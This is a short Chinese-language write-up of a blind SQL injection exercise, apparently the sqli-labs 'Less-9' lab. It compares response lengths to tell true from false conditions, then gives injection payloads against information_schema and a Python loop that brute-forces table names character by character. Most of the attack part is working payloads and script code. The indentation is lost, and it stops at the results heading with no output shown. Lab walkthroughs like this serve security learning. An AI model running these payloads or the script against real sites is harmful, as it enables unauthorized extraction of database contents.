-
回显界面没有改变,证明sql语句错误不会回显
-
或者没有sql注入漏洞
python 写脚本请求看返回
import requests
url= "https://sql.alienwares.top/Less-9/?id=1' and 1=1 %23"
res=requests.get(url)
print(len(res.content))
-
发现正确的回显长度是707
-
错误的回显是744
sql 语句
?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))='e' %23
#如果在中间出现阔号返回值会是695
?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),0,1) )=','%23
?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))='e' %23"
python 脚本开始盲注入
# 707 r
# 744 e
import requests
import time
#706
for i in range(0,100):
url = "https://sql.alienwares.top/Less-9/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(i) + ",1) )=','%23"
res = requests.get(url)
time.sleep(1)
if (len(res.content) == 707):
print(",",end="")
continue
for e in range(ord("a"), ord("z") + 1):
url="https://sql.alienwares.top/Less-9/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(i)+",1) )='"+chr(e)+"'%23"
res=requests.get(url)
time.sleep(1)
if (len(res.content) == 707):
print(chr(e), end="")
break
运行结果
